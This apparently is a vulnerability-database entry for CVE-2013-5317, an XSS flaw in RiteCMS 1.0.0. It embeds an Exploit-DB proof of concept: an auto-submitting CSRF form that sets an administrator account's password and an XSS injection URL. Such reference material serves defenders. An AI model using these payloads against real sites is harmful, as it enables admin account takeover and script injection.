CVE-2013-5317
low
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
4.5
Description
Cross-site scripting (XSS) vulnerability in RiteCMS 1.0.0 allows remote authenticated users to inject arbitrary web script or HTML via the mode parameter to cms/index.php.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
RiteCMS 1.0.0 - Multiple Vulnerabilities
###########################################################################################
# Exploit Title: RiteCMS multiple vulnerabilities
# Date: 2013 30 July
# Exploit Author: Yashar shahinzadeh
# Credit goes for: ha.cker.ir
# Vendor Homepage: http://ritecms.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 1.0.0
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir }
###########################################################################################
Summary:
========
1. CSRF - Change administrator's password
2. Cross site scripting
1. CSRF - Adding an admin account:
==================================
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
action="http://[Path to RiteCMS]/cms/index.php" method="post">
<input type="hidden" name="mode" value="users">
<input type="hidden" name="id" value="1">
<input type="hidden" name="name" value="admin1">
<input type="hidden" name="new_pw" value="admin">
<input type="hidden" name="new_pw_r" value="admin">
<input type="hidden" name="type" value="1">
<input type="hidden" name="edit_user_submitted" value="%C2%A0OK%C2%A0">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
2. Cross site scripting (After auth):
=====================================
http://localhost:80//ritecms.1.0.0.tinymce/cms/index.php?mode=[XSS]Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| ritecms | ritecms | 1.0.0 | |
References
- http://packetstormsecurity.com/files/122663/Rite-CMS-1.0.0-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
- http://www.exploit-db.com/exploits/27315
- http://www.securityfocus.com/bid/61587
- https://exchange.xforce.ibmcloud.com/vulnerabilities/86194
- http://packetstormsecurity.com/files/122663/Rite-CMS-1.0.0-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
- http://www.exploit-db.com/exploits/27315
- http://www.securityfocus.com/bid/61587
- https://exchange.xforce.ibmcloud.com/vulnerabilities/86194
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.